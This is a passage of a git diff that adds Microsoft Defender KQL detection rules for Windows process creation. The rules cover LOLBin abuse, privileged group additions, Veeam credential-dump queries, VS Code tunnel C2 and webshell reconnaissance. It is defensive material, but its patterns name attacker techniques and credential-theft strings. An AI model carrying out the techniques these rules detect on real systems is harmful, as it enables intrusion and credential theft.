+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-01
+// Level: medium
+// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate testing of Microsoft UI parts.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\VisualUiaVerifyNative.exe" or ProcessVersionInfoOriginalFileName =~ "VisualUiaVerifyNative.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_vsiisexelauncher_exe.kql b/KQL/rules/windows/process_creation/use_of_vsiisexelauncher_exe.kql
new file mode 100644
index 00000000..75a70dc7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_vsiisexelauncher_exe.kql
@@ -0,0 +1,10 @@
+// Title: Use of VSIISExeLauncher.exe
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: medium
+// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -p " or ProcessCommandLine contains " -a ") and (FolderPath endswith "\\VSIISExeLauncher.exe" or ProcessVersionInfoOriginalFileName =~ "VSIISExeLauncher.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_w32tm_as_timer.kql b/KQL/rules/windows/process_creation/use_of_w32tm_as_timer.kql
new file mode 100644
index 00000000..bbc2164c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_w32tm_as_timer.kql
@@ -0,0 +1,12 @@
+// Title: Use of W32tm as Timer
+// Author: frack113
+// Date: 2022-09-25
+// Level: high
+// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1124
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/stripchart" and ProcessCommandLine contains "/computer:" and ProcessCommandLine contains "/period:" and ProcessCommandLine contains "/dataonly" and ProcessCommandLine contains "/samples:") and (FolderPath endswith "\\w32tm.exe" or ProcessVersionInfoOriginalFileName =~ "w32time.dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_of_wfc_exe.kql b/KQL/rules/windows/process_creation/use_of_wfc_exe.kql
new file mode 100644
index 00000000..10806bbe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_of_wfc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Use of Wfc.exe
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-01
+// Level: medium
+// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+//   - Legitimate use by a software developer
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wfc.exe" or ProcessVersionInfoOriginalFileName =~ "wfc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_short_name_path_in_image.kql b/KQL/rules/windows/process_creation/use_short_name_path_in_image.kql
new file mode 100644
index 00000000..b47db9bf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_short_name_path_in_image.kql
@@ -0,0 +1,12 @@
+// Title: Use Short Name Path in Image
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-07
+// Level: medium
+// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+//   - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
+
+DeviceProcessEvents
+| where (FolderPath contains "~1\\" or FolderPath contains "~2\\") and (not((((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or (FolderPath endswith "~1\\unzip.exe" or FolderPath endswith "~1\\7zG.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe"))))) and (not(((ProcessVersionInfoProductName =~ "InstallShield (R)" or ProcessVersionInfoFileDescription =~ "InstallShield (R) Setup Engine" or ProcessVersionInfoCompanyName =~ "InstallShield Software Corporation") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/user_added_to_highly_privileged_group.kql b/KQL/rules/windows/process_creation/user_added_to_highly_privileged_group.kql
new file mode 100644
index 00000000..644ac225
--- /dev/null
+++ b/KQL/rules/windows/process_creation/user_added_to_highly_privileged_group.kql
@@ -0,0 +1,12 @@
+// Title: User Added To Highly Privileged Group
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1098
+// False Positives:
+//   - Administrative activity that must be investigated
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Group Policy Creator Owners" or ProcessCommandLine contains "Schema Admins") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/user_added_to_local_administrators_group.kql b/KQL/rules/windows/process_creation/user_added_to_local_administrators_group.kql
new file mode 100644
index 00000000..5d365188
--- /dev/null
+++ b/KQL/rules/windows/process_creation/user_added_to_local_administrators_group.kql
@@ -0,0 +1,12 @@
+// Title: User Added to Local Administrators Group
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: medium
+// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1098
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " administrators " or ProcessCommandLine contains " administrateur") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/user_added_to_remote_desktop_users_group.kql b/KQL/rules/windows/process_creation/user_added_to_remote_desktop_users_group.kql
new file mode 100644
index 00000000..8ba2f5e3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/user_added_to_remote_desktop_users_group.kql
@@ -0,0 +1,12 @@
+// Title: User Added to Remote Desktop Users Group
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-06
+// Level: high
+// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.lateral-movement, attack.t1133, attack.t1136.001, attack.t1021.001
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/user_discovery_and_export_via_get_aduser_cmdlet.kql b/KQL/rules/windows/process_creation/user_discovery_and_export_via_get_aduser_cmdlet.kql
new file mode 100644
index 00000000..c5f6fa7c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/user_discovery_and_export_via_get_aduser_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: User Discovery And Export Via Get-ADUser Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: medium
+// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033
+// False Positives:
+//   - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADUser " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/using_settingsynchost_exe_as_lolbin.kql b/KQL/rules/windows/process_creation/using_settingsynchost_exe_as_lolbin.kql
new file mode 100644
index 00000000..2f652946
--- /dev/null
+++ b/KQL/rules/windows/process_creation/using_settingsynchost_exe_as_lolbin.kql
@@ -0,0 +1,10 @@
+// Title: Using SettingSyncHost.exe as LOLBin
+// Author: Anton Kutepov, oscd.community
+// Date: 2020-02-05
+// Level: high
+// Description: Detects using SettingSyncHost.exe to run hijacked binary
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.defense-evasion, attack.t1574.008
+
+DeviceProcessEvents
+| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/utilityfunctions_ps1_proxy_dll.kql b/KQL/rules/windows/process_creation/utilityfunctions_ps1_proxy_dll.kql
new file mode 100644
index 00000000..a7ca7eff
--- /dev/null
+++ b/KQL/rules/windows/process_creation/utilityfunctions_ps1_proxy_dll.kql
@@ -0,0 +1,10 @@
+// Title: UtilityFunctions.ps1 Proxy Dll
+// Author: frack113
+// Date: 2022-05-28
+// Level: medium
+// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "UtilityFunctions.ps1" or ProcessCommandLine contains "RegSnapin "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/veeam_backup_database_suspicious_query.kql b/KQL/rules/windows/process_creation/veeam_backup_database_suspicious_query.kql
new file mode 100644
index 00000000..2aafc9c5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/veeam_backup_database_suspicious_query.kql
@@ -0,0 +1,10 @@
+// Title: Veeam Backup Database Suspicious Query
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: medium
+// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "BackupRepositories" or ProcessCommandLine contains "Backups" or ProcessCommandLine contains "Credentials" or ProcessCommandLine contains "HostCreds" or ProcessCommandLine contains "SmbFileShares" or ProcessCommandLine contains "Ssh_creds" or ProcessCommandLine contains "VSphereInfo") and ((ProcessCommandLine contains "VeeamBackup" and ProcessCommandLine contains "From ") and FolderPath endswith "\\sqlcmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql b/KQL/rules/windows/process_creation/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql
new file mode 100644
index 00000000..ecb12649
--- /dev/null
+++ b/KQL/rules/windows/process_creation/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: VeeamBackup Database Credentials Dump Via Sqlcmd.EXE
+// Author: frack113
+// Date: 2021-12-20
+// Level: high
+// Description: Detects dump of credentials in VeeamBackup dbo
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SELECT" and ProcessCommandLine contains "TOP" and ProcessCommandLine contains "[VeeamBackup].[dbo].[Credentials]") and FolderPath endswith "\\sqlcmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/verclsid_exe_runs_com_object.kql b/KQL/rules/windows/process_creation/verclsid_exe_runs_com_object.kql
new file mode 100644
index 00000000..2819ae55
--- /dev/null
+++ b/KQL/rules/windows/process_creation/verclsid_exe_runs_com_object.kql
@@ -0,0 +1,10 @@
+// Title: Verclsid.exe Runs COM Object
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects when verclsid.exe is used to run COM object via GUID
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/S" and ProcessCommandLine contains "/C") and (FolderPath endswith "\\verclsid.exe" or ProcessVersionInfoOriginalFileName =~ "verclsid.exe")) and (not(((ProcessCommandLine contains "verclsid.exe\" /S /C {" and ProcessCommandLine contains "} /I {") and InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\RuntimeBroker.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/virtualbox_driver_installation_or_starting_of_vms.kql b/KQL/rules/windows/process_creation/virtualbox_driver_installation_or_starting_of_vms.kql
new file mode 100644
index 00000000..1b3bdc3b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/virtualbox_driver_installation_or_starting_of_vms.kql
@@ -0,0 +1,12 @@
+// Title: Virtualbox Driver Installation or Starting of VMs
+// Author: Janantha Marasinghe
+// Date: 2020-09-26
+// Level: low
+// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.006, attack.t1564
+// False Positives:
+//   - This may have false positives on hosts where Virtualbox is legitimately being used for operations
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "VBoxRT.dll,RTR3Init" or ProcessCommandLine contains "VBoxC.dll" or ProcessCommandLine contains "VBoxDrv.sys") or (ProcessCommandLine contains "startvm" or ProcessCommandLine contains "controlvm")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/visual_basic_command_line_compiler_usage.kql b/KQL/rules/windows/process_creation/visual_basic_command_line_compiler_usage.kql
new file mode 100644
index 00000000..d48b4aca
--- /dev/null
+++ b/KQL/rules/windows/process_creation/visual_basic_command_line_compiler_usage.kql
@@ -0,0 +1,12 @@
+// Title: Visual Basic Command Line Compiler Usage
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-07
+// Level: high
+// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004
+// False Positives:
+//   - Utilization of this tool should not be seen in enterprise environment
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cvtres.exe" and InitiatingProcessFolderPath endswith "\\vbc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/visual_studio_code_tunnel_execution.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_execution.kql
new file mode 100644
index 00000000..d38c1c38
--- /dev/null
+++ b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_execution.kql
@@ -0,0 +1,12 @@
+// Title: Visual Studio Code Tunnel Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), citron_ninja
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001, attack.t1219
+// False Positives:
+//   - Legitimate use of Visual Studio Code tunnel
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or ((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/visual_studio_code_tunnel_service_installation.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_service_installation.kql
new file mode 100644
index 00000000..ece67324
--- /dev/null
+++ b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_service_installation.kql
@@ -0,0 +1,12 @@
+// Title: Visual Studio Code Tunnel Service Installation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the installation of VsCode tunnel (code-tunnel) as a service.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001
+// False Positives:
+//   - Legitimate installation of code-tunnel as a service
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/visual_studio_code_tunnel_shell_execution.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_shell_execution.kql
new file mode 100644
index 00000000..8b11bba6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_shell_execution.kql
@@ -0,0 +1,12 @@
+// Title: Visual Studio Code Tunnel Shell Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001
+// False Positives:
+//   - Legitimate use of Visual Studio Code tunnel and running code from there
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains ".vscode-server" and InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe") and ((ProcessCommandLine contains "\\terminal\\browser\\media\\shellIntegration.ps1" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\bash.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql
new file mode 100644
index 00000000..858789b3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql
@@ -0,0 +1,12 @@
+// Title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-11
+// Level: medium
+// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate use by developers as part of NodeJS development with Visual Studio Tools
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_renamed_execution.kql b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_renamed_execution.kql
new file mode 100644
index 00000000..3975e524
--- /dev/null
+++ b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_renamed_execution.kql
@@ -0,0 +1,10 @@
+// Title: Visual Studio NodejsTools PressAnyKey Renamed Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2023-04-11
+// Level: medium
+// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/vmtoolsd_suspicious_child_process.kql b/KQL/rules/windows/process_creation/vmtoolsd_suspicious_child_process.kql
new file mode 100644
index 00000000..707a88f1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/vmtoolsd_suspicious_child_process.kql
@@ -0,0 +1,12 @@
+// Title: VMToolsd Suspicious Child Process
+// Author: bohops, Bhabesh Raj
+// Date: 2021-10-08
+// Level: high
+// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+// False Positives:
+//   - Legitimate use by VM administrator
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/volumeshadowcopy_symlink_creation_via_mklink.kql b/KQL/rules/windows/process_creation/volumeshadowcopy_symlink_creation_via_mklink.kql
new file mode 100644
index 00000000..6da102e1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/volumeshadowcopy_symlink_creation_via_mklink.kql
@@ -0,0 +1,12 @@
+// Title: VolumeShadowCopy Symlink Creation Via Mklink
+// Author: Teymur Kheirkhabarov, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Shadow Copies storage symbolic link creation using operating systems utilities
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003
+// False Positives:
+//   - Legitimate administrator working with shadow copies, access for backup purposes
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "mklink" and ProcessCommandLine contains "HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wab_execution_from_non_default_location.kql b/KQL/rules/windows/process_creation/wab_execution_from_non_default_location.kql
new file mode 100644
index 00000000..fc73bb67
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wab_execution_from_non_default_location.kql
@@ -0,0 +1,10 @@
+// Title: Wab Execution From Non Default Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wab_wabmig_unusual_parent_or_child_processes.kql b/KQL/rules/windows/process_creation/wab_wabmig_unusual_parent_or_child_processes.kql
new file mode 100644
index 00000000..23d1fead
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wab_wabmig_unusual_parent_or_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: Wab/Wabmig Unusual Parent Or Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\wab.exe" or InitiatingProcessFolderPath endswith "\\wabmig.exe") or ((FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/weak_or_abused_passwords_in_cli.kql b/KQL/rules/windows/process_creation/weak_or_abused_passwords_in_cli.kql
new file mode 100644
index 00000000..1fa517ab
--- /dev/null
+++ b/KQL/rules/windows/process_creation/weak_or_abused_passwords_in_cli.kql
@@ -0,0 +1,14 @@
+// Title: Weak or Abused Passwords In CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
+// An example would be a threat actor creating a new user via the net command and providing the password inline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+//   - Legitimate usage of the passwords by users via commandline (should be discouraged)
+//   - Other currently unknown false positives
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/webdav_client_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..057f3ed2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/webdav_client_execution_via_rundll32_exe.kql
@@ -0,0 +1,11 @@
+// Title: WebDav Client Execution Via Rundll32.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie".
+// This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/webshell_detection_with_command_line_keywords.kql b/KQL/rules/windows/process_creation/webshell_detection_with_command_line_keywords.kql
new file mode 100644
index 00000000..000b1ee1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/webshell_detection_with_command_line_keywords.kql
@@ -0,0 +1,10 @@
+// Title: Webshell Detection With Command Line Keywords
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community, Chad Hudson, Matt Anderson
+// Date: 2017-01-01
+// Level: high
+// Description: Detects certain command line parameters often used during reconnaissance activity via web shells
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
+
+DeviceProcessEvents
+| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "cd /d ") or ((FolderPath endswith "\\dsquery.exe" or FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\pathping.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\tracert.exe" or FolderPath endswith "\\ver.exe" or FolderPath endswith 